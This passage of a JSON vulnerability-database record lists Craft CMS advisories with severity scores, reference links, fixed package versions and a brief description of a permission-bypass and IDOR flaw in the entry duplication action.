R:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:22Z/"}],"url":"https://github.com/craftcms/cms/commit/cfd6ba0e2ce1a59a02d75cae6558c4ace1ab8bd4"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/S
I:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:22Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25491","reference_id":"CVE-2026-25491","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25491"},{"reference_url":"https://github.com/advisories/GHSA-7pr4-wx9w-mqwr","reference_id":"GHSA-7pr4-wx9w-mqwr","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7pr4-wx9w-mqwr"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7pr4-wx9w-mqwr","reference_id":"GHSA-7pr4-wx9w-mqwr","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:22Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7pr4-w
x9w-mqwr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25491","GHSA-7pr4-wx9w-mqwr"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vvhc-rnpr-ubey"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/506
42?format=json","vulnerability_id":"VCID-w9yn-1573-hyau","summary":"Craft CMS has Permission Bypass and IDOR in Duplicate Entry Action\nThe \"Duplicate\" entry action does not properly verify if the user has permission to perform this action on the specific target elements.\nEven with only \"View Entries\" permission (where the \"Duplicate\" action is restricted in the UI), a user can bypass this restriction by sending a direct request.\n\nFurthermore, this vulnerability allows duplicating **other users' entries** by specifying their Entry IDs. Since Entry IDs are incremental, an attacker can trivially brute-force these IDs to duplicate and access restricted content across the system.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28782","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13004","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28782"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/fb61a91357f5761c852400185ba931f51d82783d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:34:53Z/"}],"url":"https://github.com/craftcms/cms/co
mmit/fb61a91357f5761c852400185ba931f51d82783d"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28782","reference_id":"CVE-2026-28782","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28782"},{"reference_url":"https://github.com/advisories/GHSA-jxm3-pmm2-9gf6","reference_id":"GHSA-jxm3-pmm2-9gf6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jxm3-pmm2-9gf6"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-jxm3-pmm2-9gf6","reference_id":"GHSA-jxm3-pmm2-9gf6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:34:53Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-jxm3-pmm2-9gf6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vu
lnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28782","GHSA-jxm3-pmm2-9gf6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w9yn-1573-hyau"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.2.9"}